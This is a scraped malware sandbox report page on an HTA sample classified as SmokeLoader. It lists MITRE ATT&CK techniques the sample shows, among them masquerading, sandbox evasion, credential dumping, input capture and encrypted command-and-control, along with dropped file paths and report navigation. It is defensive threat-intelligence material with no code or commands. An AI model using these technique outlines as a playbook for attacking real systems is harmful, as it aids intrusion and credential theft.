Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report begoodforeverythinggreatthingsformebetterforgood.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_f0a768defacff880d8626d1749fd6d847b83e1c3_07ad8ade_de04faf2-2b87-46aa-965d-40ddd7d19ffd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER538.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER683.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\icgfugf.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sweetnessgoodforgreatnessthingswithgood[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
begoodforeverythinggreatthingsformebetterforgood.hta

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre